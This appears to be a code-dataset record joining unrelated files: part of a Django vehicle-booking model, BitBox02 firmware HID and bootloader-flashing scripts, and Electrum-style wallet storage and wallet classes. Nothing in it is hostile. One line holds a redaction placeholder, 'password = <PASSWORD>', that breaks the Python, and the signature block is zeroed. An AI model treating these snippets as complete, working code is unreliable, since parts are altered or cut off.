class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
class MetaData:
list_display = [
('name', _(u'Nom')),
]
details_display = list_display + [
('description', _(u'Description')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description')
base_title = _(u'Fournisseurs')
list_title = _(u'Liste des fournisseurs')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-suitcase'
menu_id = 'menu-vehicles-provider'
help_list = _(u"""Les entreprises fournissant des services de locations de véhicules.""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
def get_types(self):
return self.vehicletype_set.filter(deleted=False).order_by('name')
def get_cards(self):
return self.card_set.filter(deleted=False).order_by('name')
class _VehicleType(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
provider = FalseFK('vehicles.models.Provider', verbose_name=_('Fournisseur'))
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
class MetaData:
list_display = [
('name', _(u'Nom')),
('provider', _(u'Fournisseur')),
]
details_display = list_display + [
('description', _(u'Description')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description', 'provider__name')
base_title = _(u'Types de véhicule')
list_title = _(u'Liste des types de véhicules')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-truck'
menu_id = 'menu-vehicles-type'
help_list = _(u"""Les différents types de véhicules, par fournisseur""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
'provider',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
class _Card(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
provider = FalseFK('vehicles.models.Provider', verbose_name=_('Fournisseur'))
name = models.CharField(_('Nom'), max_length=255)
number = models.CharField(_(u'Numéro'), max_length=255)
description = models.TextField(_('Description'))
exclusif = models.BooleanField(_('Usage exclusif'), default=True, help_text=_(u'Ne peut pas être utilisé plusieurs fois en même temps ?'))
class MetaData:
list_display = [
('name', _(u'Nom')),
('provider', _(u'Fournisseur')),
('number', _(u'Numéro')),
]
details_display = list_display + [
('description', _(u'Description')),
('exclusif', _(u'Usage exclusif'))
]
default_sort = "[1, 'asc']" # name
yes_or_no_fields = ['exclusif']
filter_fields = ('name', 'number', 'description', 'provider__name')
base_title = _(u'Cartes')
list_title = _(u'Liste des cartes')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-credit-card'
menu_id = 'menu-vehicles-cards'
help_list = _(u"""Les différentes cartes utilisées pour les réservations""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
'provider',
'number',
]
class Meta:
abstract = True
def __unicode__(self):
return u'{} ({})'.format(self.name, self.number)
class _Location(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
url_location = models.URLField(_('URL carte lieu'), blank=True, null=True)
class MetaData:
list_display = [
('name', _(u'Nom')),
]
details_display = list_display + [
('description', _(u'Description')),
('url_location', _(u'URL carte lieu')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description')
base_title = _(u'Lieux')
list_title = _(u'Liste des lieux')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-location-arrow'
menu_id = 'menu-vehicles-location'
help_list = _(u"""Les lieux de récupération des locations""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
class _Booking(GenericModel, GenericGroupsModerableModel, GenericGroupsModel, GenericContactableModel, GenericStateRootValidable, GenericStateModel, UnitEditableModel, SearchableModel):
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
access = 'LOGISTIQUE'
moderation_access = 'SECRETARIAT'
unit = FalseFK('units.models.Unit')
title = models.CharField(_(u'Titre'), max_length=255)
responsible = models.ForeignKey(TruffeUser, verbose_name=_(u'Responsable'))
reason = models.TextField(_(u'Motif'))
remark = models.TextField(_(u'Remarques'), blank=True, null=True)
remark_agepoly = models.TextField(_(u'Remarques AGEPoly'), blank=True, null=True)
provider = FalseFK('vehicles.models.Provider', verbose_name=_(u'Fournisseur'))
vehicletype = FalseFK('vehicles.models.VehicleType', verbose_name=_(u'Type de véhicule'))
card = FalseFK('vehicles.models.Card', verbose_name=_(u'Carte'), blank=True, null=True)
location = FalseFK('vehicles.models.Location', verbose_name=_(u'Lieu'), blank=True, null=True)
start_date = models.DateTimeField(_(u'Début de la réservation'))
end_date = models.DateTimeField(_(u'Fin de la réservation'))
class MetaData:
list_display = [
('title', _('Titre')),
('start_date', _(u'Date début')),
('end_date', _('Date fin')),
('provider', _('Fournisseur')),
('vehicletype', _(u'Type de véhicule')),
('status', _('Statut')),
]
details_display = list_display + [
('responsible', _('Responsable')),
('reason', _('Motif')),
('remark', _('Remarques')),
('remark_agepoly', _('Remarques AGEPoly')),
('card', _('Carte')),
('get_location', _('Lieu')),
]
filter_fields = ('title', 'status')
base_title = _(u'Réservations de véhicule')
list_title = _(u'Liste de toutes les réservations de véhicules')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-ambulance'
default_sort = "[3, 'desc']" # end_date
forced_widths = {
'1': '25%',
'2': '140px', # start date
'3': '140px', # end date
}
forced_widths_related = {
'1': '15%',
'2': '25%',
'4': '150px', # start date
'5': '150px', # end date
}
menu_id = 'menu-vehicles-booking'
menu_id_calendar = 'menu-vehicles-booking-calendar'
menu_id_calendar_related = 'menu-vehicles-booking-calendar-related'
datetime_fields = ['start_date', 'end_date']
safe_fields = ['get_location']
has_unit = True
help_list = _(u"""Les réservations de véhicules te permettent de demander la location d'un véhicule pour ton unité.
Ils sont soumis à validation par le secrétariat de l'AGEPoly. Il faut toujours faire les réservations le plus tôt possible !""")
help_list_related = _(u"""La liste de toutes les réservations de véhicules.""")
@staticmethod
def extra_args_for_edit(request, current_unit, current_year):
from vehicles.models import Provider
return {'providers': Provider.objects.filter(deleted=False).order_by('name')}
class MetaEdit:
datetime_fields = ('start_date', 'end_date')
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule réservation'
fields = [
'title',
'card',
'provider',
'location',
'vehicletype',
'responsible',
'remark',
'reason',
'remark_agepoly',
]
class MetaState(GenericStateRootValidable.MetaState):
states_texts = {
'0_draft': _(u'La réservation est en cours de création et n\'est pas publique.'),
'1_asking': _(u'La réservation est en cours de modération. Elle n\'est pas éditable. Sélectionner ce statut pour demander une modération !'),
            '2_online': _(u'La réservation est validée. Elle n\'est pas éditable.'),
'3_archive': _(u'La réservation est archivée. Elle n\'est plus modifiable.'),
'4_deny': _(u'La modération a été refusée. Le véhicule n\'était probablement pas disponible.'),
}
def build_form_validation(request, obj):
from vehicles.models import Location
class FormValidation(forms.Form):
remark_agepoly = forms.CharField(label=_('Remarque'), widget=forms.Textarea, required=False)
card = forms.ModelChoiceField(label=_(u'Carte'), queryset=obj.provider.get_cards(), required=False)
location = forms.ModelChoiceField(label=_(u'Lieu'), queryset=Location.objects.filter(deleted=False).order_by('name'), required=False)
return FormValidation
states_bonus_form = {
'2_online': build_form_validation
}
def switch_status_signal(self, request, old_status, dest_status):
from vehicles.models import Location, Card
if dest_status == '2_online':
if request.POST.get('remark_agepoly'):
if self.remark_agepoly:
self.remark_agepoly += '\n' + request.POST.get('remark_agepoly')
else:
self.remark_agepoly = request.POST.get('remark_agepoly')
self.save()
if request.POST.get('card'):
self.card = get_object_or_404(Card, pk=request.POST.get('card'), provider=self.provider, deleted=False)
self.save()
if request.POST.get('location'):
self.location = get_object_or_404(Location, pk=request.POST.get('location'), deleted=False)
self.save()
s = super(_Booking, self)
if hasattr(s, 'switch_status_signal'):
s.switch_status_signal(request, old_status, dest_status)
class Meta:
abstract = True
def __unicode__(self):
return self.title
def get_location(self):
if self.location:
if self.location.url_location:
return u'<a href="{}">{}</a>'.format(self.location.url_location, self.location)
else:
return self.location.__unicode__()
else:
return ''
def genericFormExtraInit(self, form, current_user, *args, **kwargs):
"""Remove fields that should be edited by SECRETARIAT CDD only."""
if not self.rights_in_root_unit(current_user, 'SECRETARIAT'):
del form.fields['card']
del form.fields['location']
del form.fields['remark_agepoly']
unit_users_pk = map(lambda user: user.pk, self.unit.users_with_access())
form.fields['responsible'].queryset = TruffeUser.objects.filter(pk__in=unit_users_pk).order_by('first_name', 'last_name')
def genericFormExtraClean(self, data, form):
if 'provider' in data:
if 'card' in data and data['card']:
if data['card'].provider != data['provider']:
raise forms.ValidationError(_(u'La carte n\'est pas lié au fournisseur sélectionné'))
            if 'vehicletype' in data and data['vehicletype']:
                if data['vehicletype'].provider != data['provider']:
raise forms.ValidationError(_(u'Le type de véhicule n\'est pas lié au fournisseur sélectionné'))
def conflicting_reservation(self):
        # A booking conflicts when another validated, non-deleted booking overlaps this one in time.
        return self.__class__.objects.exclude(pk=self.pk).exclude(deleted=True).filter(status__in=['2_online'], end_date__gt=self.start_date, start_date__lt=self.end_date)
``` |
{
"source": "jonathancross/bitbox02-firmware",
"score": 2
} |
#### File: py/bitbox02/devices.py
```python
import re
from typing import List, Optional
from typing_extensions import TypedDict
import hid
import semver
BB02_BOOTLOADER = "bb02-bootloader"
BB02BTC_BOOTLOADER = "bb02btc-bootloader"
BITBOX02 = "BitBox02"
class DeviceInfo(TypedDict):
serial_number: str
path: bytes
product_string: str
def get_bitbox02_devices(product_string: str = BITBOX02) -> List[DeviceInfo]:
"""
Scans devices and returns a list of hid device info objects.
"""
# TODO: product id is 0x2403, but 0x2402 is the id of some dev
# device bootloaders. Can be removed in time, not needed for
# production devices.
return [
info
for info in hid.enumerate()
if info["vendor_id"] == 0x03EB
and info["product_id"] in (0x2402, 0x2403)
and (info["usage_page"] == 0xFFFF or info["interface_number"] == 0)
and info["product_string"] == product_string
]
def parse_device_version(serial_number: str) -> Optional[semver.VersionInfo]:
match = re.search(r"v([0-9]+\.[0-9]+\.[0-9]+.*)", serial_number)
if match is None:
return None
return semver.VersionInfo.parse(match.group(1))
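# Minimal usage sketch (assumption: illustrative only, not part of the original module):
# for info in get_bitbox02_devices():
#     print(info["path"], parse_device_version(info["serial_number"]))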
```
#### File: bitbox02-firmware/py/load_firmware.py
```python
import sys
import pprint
from typing import Any, List
from time import sleep
from bitbox02 import devices
from bitbox02 import Bootloader, BitBox02
def eprint(*args: Any, **kwargs: Any) -> None:
"""
Like print, but defaults to stderr.
"""
kwargs.setdefault("file", sys.stderr)
print(*args, **kwargs)
def main() -> int:
"""Main function"""
debug = len(sys.argv) == 3 and sys.argv[2] == "debug"
if not (len(sys.argv) == 2 or debug):
eprint("\n\nUsage:\n\tpython load_firmware.py firmware_name.bin [debug]")
eprint(
"\tif debug is specified, the firmware should be unsigned, otherwise it "
"should be signed."
)
return 1
filename = sys.argv[1]
if not debug and ".signed.bin" not in filename:
eprint("Expecting signed firmware")
return 1
bootloaders = devices.get_bitbox02_devices(devices.BB02_BOOTLOADER)
bootloaders.extend(devices.get_bitbox02_devices(devices.BB02BTC_BOOTLOADER))
bitboxes = devices.get_bitbox02_devices()
def _wait_for_bootloaders() -> List[devices.DeviceInfo]:
while True:
bootloaders = devices.get_bitbox02_devices(devices.BB02_BOOTLOADER)
bootloaders.extend(devices.get_bitbox02_devices(devices.BB02BTC_BOOTLOADER))
if bootloaders:
return bootloaders
sys.stdout.write(".")
sleep(1)
if not bootloaders:
if len(bitboxes) != 1:
eprint(
"No bitbox02 bootloader detected. Insert exactly one bootloader or "
"bitbox02 device."
)
return 1
# bitbox02 detected -> send command to reboot into bootloader to upgrade.
def show_pairing(code: str) -> None:
eprint("Please compare and confirm the pairing code on your BitBox02:")
eprint(code)
bitbox = BitBox02(device_info=bitboxes[0], show_pairing_callback=show_pairing)
bitbox.reboot()
bootloaders = _wait_for_bootloaders()
if len(bootloaders) > 1:
eprint("Multiple bootloaders detected. Only one supported")
return 1
pprint.pprint(bootloaders[0])
bootloader = Bootloader(bootloaders[0])
with open(filename, "rb") as file:
firmware = file.read()
def progress(perc: float) -> None:
sys.stdout.write(f"{perc*100:.02f}%\r")
if bootloader.erased():
print("device contains NO firmware")
else:
print("firmware version: %d\nsigning pubkeys version: %d" % bootloader.versions())
firmware_hash, signing_keydata_hash = bootloader.get_hashes()
print("firmware hash:", firmware_hash.hex())
print("signing keydata hash:", signing_keydata_hash.hex())
if debug:
bootloader.flash_unsigned_firmware(firmware, progress)
else:
bootloader.flash_signed_firmware(firmware, progress)
print() # print a newline
sleep(1) # Pause to show the upgrade finished at 100%
bootloader.reboot()
return 0
if __name__ == "__main__":
sys.exit(main())
```
#### File: py/old/dbb_utils.py
```python
import os
import sys
import json
import base64
import pyaes
import hid # hidapi (requires cython)
import hashlib
import struct
import time
import binascii
# ----------------------------------------------------------------------------------
#
# TODO: update accordingly
v2_serial_number = "dbb.fw:v0.0.1"
applen_v2 = 0xF0000 # BitBox_v2 firmware size
applen_v1 = 0x37000 # BitBox_v1 firmware size
chunksize = 8*512
usb_report_size = 64 # firmware > v2.0
# v1 size for boot commands:
boot_buf_size_send = 4098
boot_buf_size_reply = 256
class Usage:
"""The USB usage"""
interface = 1
usage_page = 0xFFFF
def __init__(self, interface, usage_page):
self.interface = interface
self.usage_page = usage_page
USB_HWW = Usage(0, 0xFFFF)
USB_U2F = Usage(1, 0xD0F1)
# ----------------------------------------------------------------------------------
# Crypto
#
def aes_encrypt_with_iv(key, iv, data):
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Encrypter(aes_cbc)
e = aes.feed(data) + aes.feed() # empty aes.feed() appends pkcs padding
return e
def aes_decrypt_with_iv(key, iv, data):
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Decrypter(aes_cbc)
s = aes.feed(data) + aes.feed() # empty aes.feed() strips pkcs padding
return s
def EncodeAES(secret, s):
iv = bytes(os.urandom(16))
ct = aes_encrypt_with_iv(secret, iv, s)
e = iv + ct
return base64.b64encode(e)
def DecodeAES(secret, e):
e = bytes(base64.b64decode(e))
iv, e = e[:16], e[16:]
s = aes_decrypt_with_iv(secret, iv, e)
return s
def sha256(x):
return hashlib.sha256(x).digest()
def Hash(x):
if type(x) is bytes: return sha256(sha256(x))
if type(x) is not bytearray: x=x.encode('utf-8')
return sha256(sha256(x))
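# Round-trip sketch of the envelope built above (assumption: illustrative only):
# the wire format is base64(iv || AES-256-CBC ciphertext) keyed with the
# double-SHA256 of the password.
# secret = Hash('my password')
# blob = EncodeAES(secret, b'{"ping": ""}')
# assert DecodeAES(secret, blob) == b'{"ping": ""}'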
# ----------------------------------------------------------------------------------
# HID
#
def getHidPath(usage):
for d in hid.enumerate(0, 0):
if d['vendor_id'] == 0x03eb and d['product_id'] in (0x2402, 0x2403):
if d['interface_number'] == usage.interface or d['usage_page'] == usage.usage_page:
# hidapi is not consistent across platforms
# usage_page works on Windows/Mac; interface_number works on Linux
return d['path']
dbb_hid = hid.device()
dbb_version = None
def identifyVersion():
global dbb_version
serial_number = dbb_hid.get_serial_number_string()
if serial_number == v2_serial_number:
dbb_version = 2
else:
dbb_version = 1
def openHid():
openSpecificHid(USB_HWW)
def closeHid():
    dbb_hid.close()
def openSpecificHid(usage):
print("\nOpening device")
try:
dbb_hid.open_path(getHidPath(usage))
print("\tManufacturer: %s" % dbb_hid.get_manufacturer_string())
print("\tProduct: %s" % dbb_hid.get_product_string())
print("\tSerial No: %s\n\n" % dbb_hid.get_serial_number_string())
identifyVersion()
print("\tBitBox Version No: %s\n\n" % dbb_version)
except Exception as e:
print("\nDevice not found: (%s)\n" % str(e))
sys.exit()
# ----------------------------------------------------------------------------------
# ISO 7816-4
#
HWW_CID = 0xFF000000
HWW_CMD = 0x80 + 0x40 + 0x01
U2F_PING_CMD = 0x80 + 0x01
def hid_send_frames(cmd, data):
data = bytearray(data)
data_len = len(data)
    seq = 0
    idx = 0
write = []
while idx < data_len:
if idx == 0:
# INIT frame
write = data[idx : idx + min(data_len, usb_report_size - 7)]
dbb_hid.write(b'\0' + struct.pack(">IBH",HWW_CID, cmd, data_len & 0xFFFF) + write + b'\xEE' * (usb_report_size - 7 - len(write)))
else:
# CONT frame
write = data[idx : idx + min(data_len, usb_report_size - 5)]
dbb_hid.write(b'\0' + struct.pack(">IB", HWW_CID, seq) + write + b'\xEE' * (usb_report_size - 5 - len(write)))
seq += 1
idx += len(write)
def hid_read_frames(cmd=HWW_CMD, timeout=5):
# INIT response
if timeout is None:
        timeout = 30
timeout_ms = timeout * 1000
read = dbb_hid.read(usb_report_size, timeout_ms)
if len(read) >= 3:
cid = ((read[0] * 256 + read[1]) * 256 + read[2]) * 256 + read[3]
reply_cmd = read[4]
data_len = read[5] * 256 + read[6]
data = read[7:]
        idx = len(read) - 7
while idx < data_len:
# CONT response
read = dbb_hid.read(usb_report_size, timeout_ms)
if len(read) < 3:
raise Exception('Did not receive a continuation frame after %d seconds' % timeout)
data += read[5:]
idx += len(read) - 5
assert cid == HWW_CID, '- USB command ID mismatch'
assert reply_cmd == cmd, '- USB command frame mismatch'
return data
else:
raise Exception('Did not read anything after %d seconds' % timeout)
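# Frame layout implemented by hid_send_frames/hid_read_frames above (descriptive note):
#   INIT frame: report id (0x00) + 4-byte channel id + 1-byte command + 2-byte payload
#               length, followed by the first payload slice, padded with 0xEE bytes.
#   CONT frame: report id (0x00) + 4-byte channel id + 1-byte sequence number,
#               followed by the next payload slice, padded with 0xEE bytes.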
# ----------------------------------------------------------------------------------
# Firmware API (keep consistent with the Electrum plugin)
#
def hid_read(cmd=HWW_CMD, timeout=None):
try:
reply = hid_read_frames(cmd, timeout)
reply = bytearray(reply).rstrip(b' \t\r\n\0')
except Exception as e:
reply = ''
print('Exception caught: ' + str(e))
return reply
def hid_read_json(timeout=None):
try:
r = hid_read(HWW_CMD, timeout)
r = ''.join(chr(e) for e in r)
reply = json.loads(r)
print("JSON: {}".format(reply))
except Exception as e:
reply = ''
print('Exception caught: ' + str(e))
return reply
def hid_send_msg(msg, cmd=HWW_CMD):
if type(msg) == str:
msg = msg.encode()
try:
serial_number = dbb_hid.get_serial_number_string()
if serial_number == "dbb.fw:v2.0.0" or serial_number == "dbb.fw:v1.3.2" or serial_number == "dbb.fw:v1.3.1":
print('Please upgrade your firmware: digitalbitbox.com/firmware')
sys.exit()
hid_send_frames(cmd, msg)
except Exception as e:
print('Exception caught: ' + str(e))
def hid_send_and_read(msg, timeout=None):
hid_send_msg(msg)
return hid_read(HWW_CMD, timeout)
def hid_send_and_read_json(msg, timeout=None):
hid_send_msg(msg)
return hid_read_json(timeout)
def hid_send_encrypt(msg, password, timeout=None):
print("Sending: {}".format(msg))
reply = ""
try:
secret = Hash(password)
msg = EncodeAES(secret, msg)
reply = hid_send_and_read_json(msg, timeout)
if 'ciphertext' in reply:
reply = DecodeAES(secret, ''.join(reply["ciphertext"]))
print("Reply: {}\n".format(reply))
reply = json.loads(reply)
if 'error' in reply:
password = <PASSWORD>
print("\n\nReply: {}\n\n".format(reply))
except Exception as e:
print('Exception caught ' + str(e))
return reply
# ----------------------------------------------------------------------------------
# Bootloader API
#
def sendBoot(msg, timeout=None):
if dbb_version == 2:
hid_send_frames(HWW_CMD, bytearray(msg))
reply = bytes(hid_read_frames(HWW_CMD, timeout))
#reply = ''.join(chr(e) for e in reply)
elif dbb_version == 1:
msg = bytearray(msg) + b'\0' * (boot_buf_size_send - len(msg))
dbb_hid.write(b'\0' + msg)
reply = []
while len(reply) < boot_buf_size_reply:
reply = reply + dbb_hid.read(boot_buf_size_reply)
reply = bytearray(reply).rstrip(b' \t\r\n\0')
reply = ''.join(chr(e) for e in reply)
else:
print("\nBootloader version error\n\n")
sys.exit()
return reply
def sendPlainBoot(msg):
try:
print("\nSending: {}".format(msg[:2]))
reply = sendBoot(msg)
if msg.startswith(b's'):
print("Reply: {} {} (firmware hash)\n".format(reply[:2], binascii.hexlify(reply[2:34])))
else:
print("Reply: {} {}\n".format(reply[:2], reply[2:]))
return reply
except Exception as e:
print('Exception caught ' + str(e))
        return ""
def sendChunk(chunknum, data):
try:
# \x77 = 'w'
b = bytearray(b"\x77\x00")
b[1] = chunknum % 0xFF
b.extend(data)
reply = sendBoot(b)
print("Loaded: {} Code: {}".format(chunknum, reply))
except Exception as e:
print('Exception caught ' + str(e))
def sendBin(filename):
with open(filename, "rb") as f:
cnt = 0
while True:
data = f.read(chunksize)
if len(data) == 0:
break
sendChunk(cnt, data)
cnt += 1
```
#### File: py/old/old_load_firmware.py
```python
import sys
import binascii
from dbb_utils import *
if len(sys.argv) != 3:
print('\n\nUsage:\n\tpython load_firmware.py firmware_name.bin firmware_version\n\n')
sys.exit()
else:
fn = sys.argv[1]
version = sys.argv[2]
# Private key signatures (order is important)
if 'signed' in fn:
print('\n\nPlease load the unsigned firmware binfile. Signatures are added within this script.\n\n')
sys.exit()
elif version:
sig = (
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
)
else:
print('\n\nError: invalid firmware version ({}). Use the form \'vX.X.X\'\n\n'.format(version))
sys.exit()
def printFirmwareHash(filename):
with open(filename, "rb") as f:
data = f.read()
applen = applen_v2 if version == 2 else applen_v1
data += b'\xFF' * (applen - len(data))
print('\nHashed firmware', binascii.hexlify(Hash(data)))
# ----------------------------------------------------------------------------------
try:
openHid()
printFirmwareHash(fn)
sendPlainBoot(b'b') # blink led
sendPlainBoot(b'v') # bootloader version
sendPlainBoot(b'e') # erase existing firmware (required)
sendBin(fn) # send new firmware
# upload sigs and verify new firmware
load_result = sendPlainBoot(b's\0' + binascii.unhexlify(sig))
if load_result[1] == 'V':
latest_version, = struct.unpack('>I', binascii.unhexlify(load_result[2+64:][:8]))
app_version, = struct.unpack('>I', binascii.unhexlify(load_result[2+64+8:][:8]))
print('ERROR: firmware downgrade not allowed. Got version %d, but must be equal or higher to %d' % (app_version, latest_version))
elif load_result[1] != b'0'[0]:
print('ERROR: invalid firmware signature\n\n')
else:
print('SUCCESS: valid firmware signature\n\n')
sendPlainBoot(b'r') # reboot
except IOError as ex:
print(ex)
except (KeyboardInterrupt, SystemExit):
print('Exiting code')
``` |
{
"source": "jonathancross/p2wpkh-in-p2sh",
"score": 2
} |
#### File: p2wpkh-in-p2sh/lib/storage.py
```python
import os
import threading
import json
import copy
import stat
import pbkdf2, hmac, hashlib
import base64
import zlib
from .util import PrintError
from . import bitcoin
# seed_version is now used for the version of the wallet file
FINAL_SEED_VERSION = 16 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class WalletStorage(PrintError):
def __init__(self, path):
self.lock = threading.RLock()
self.data = {}
self.path = path
self.modified = False
self.pubkey = None
if self.file_exists():
with open(self.path, "r") as f:
self.raw = f.read()
if not self.is_encrypted():
self.load_data(self.raw)
else:
# avoid new wallets getting 'upgraded'
self.put('seed_version', FINAL_SEED_VERSION)
def is_encrypted(self):
try:
return base64.b64decode(self.raw)[0:4] == b'BIE1'
except:
return False
def file_exists(self):
return self.path and os.path.exists(self.path)
def get_key(self, password):
secret = pbkdf2.PBKDF2(password, '', iterations = 1024, macmodule = hmac, digestmodule = hashlib.sha512).read(64)
ec_key = bitcoin.EC_KEY(secret)
return ec_key
def set_password(self, password, encrypt):
self.put('use_encryption', bool(password))
if encrypt and password:
ec_key = self.get_key(password)
self.pubkey = ec_key.get_public_key()
else:
self.pubkey = None
def get(self, key, default=None):
with self.lock:
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
def put(self, key, value):
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error("json error: cannot save", key)
return
with self.lock:
if value is not None:
if self.data.get(key) != value:
self.modified = True
self.data[key] = copy.deepcopy(value)
elif key in self.data:
self.modified = True
self.data.pop(key)
def write(self):
with self.lock:
self._write()
def _write(self):
        if threading.current_thread().daemon:
self.print_error('warning: daemon thread cannot write wallet')
return
if not self.modified:
return
s = json.dumps(self.data, indent=4, sort_keys=True)
if self.pubkey:
s = bytes(s, 'utf8')
c = zlib.compress(s)
s = bitcoin.encrypt_message(c, self.pubkey)
s = s.decode('utf8')
temp_path = "%s.tmp.%s" % (self.path, os.getpid())
with open(temp_path, "w") as f:
f.write(s)
f.flush()
os.fsync(f.fileno())
mode = os.stat(self.path).st_mode if os.path.exists(self.path) else stat.S_IREAD | stat.S_IWRITE
# perform atomic write on POSIX systems
try:
os.rename(temp_path, self.path)
except:
os.remove(self.path)
os.rename(temp_path, self.path)
os.chmod(self.path, mode)
self.print_error("saved", self.path)
self.modified = False
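# Minimal usage sketch (assumption: illustrative only; plain-text storage, no password):
# storage = WalletStorage('/tmp/example_wallet')
# storage.put('gap_limit', 20)
# storage.write()
# assert storage.get('gap_limit') == 20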
```
#### File: p2wpkh-in-p2sh/lib/wallet.py
```python
import os
import threading
import json
import copy
from .util import PrintError
from .bitcoin import *
from .keystore import load_keystore
from . import bitcoin
class Abstract_Wallet(PrintError):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
def __init__(self, storage):
self.storage = storage
self.network = None
self.gap_limit_for_change = 6 # constant
# saved fields
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.load_keystore()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.lock = threading.Lock()
self.transaction_lock = threading.Lock()
self.check_history()
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_transactions(self):
self.txi = self.storage.get('txi', {})
self.txo = self.storage.get('txo', {})
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if self.txi.get(tx_hash) is None and self.txo.get(tx_hash) is None and (tx_hash not in self.pruned_txo.values()):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
def save_transactions(self, write=False):
with self.transaction_lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
self.storage.put('txi', self.txi)
self.storage.put('txo', self.txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
self.storage.put('addr_history', self.history)
if write:
self.storage.write()
def build_reverse_history(self):
self.tx_addr_hist = {}
for addr, hist in self.history.items():
for tx_hash, h in hist:
s = self.tx_addr_hist.get(tx_hash, set())
s.add(addr)
self.tx_addr_hist[tx_hash] = s
def check_history(self):
save = False
        mine_addrs = list(filter(lambda k: self.is_mine(k), self.history.keys()))
if len(mine_addrs) != len(self.history.keys()):
save = True
for addr in mine_addrs:
hist = self.history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo.values() or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
self.storage.put('addresses', {'receiving':self.receiving_addresses, 'change':self.change_addresses})
def load_addresses(self):
d = self.storage.get('addresses', {})
if type(d) != dict: d={}
self.receiving_addresses = d.get('receiving', [])
self.change_addresses = d.get('change', [])
def synchronize(self):
pass
def is_mine(self, address):
return address in self.get_addresses()
def get_address_index(self, address):
if address in self.receiving_addresses:
return False, self.receiving_addresses.index(address)
if address in self.change_addresses:
return True, self.change_addresses.index(address)
raise Exception("Address not found", address)
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
# return the total amount ever received by an address
# return the balance of a bitcoin address: confirmed and matured, unconfirmed, unmatured
def get_addresses(self):
out = []
out += self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
for tx_hash, tx_height in h:
if tx_height == 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def add_address(self, address):
if address not in self.history:
self.history[address] = []
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
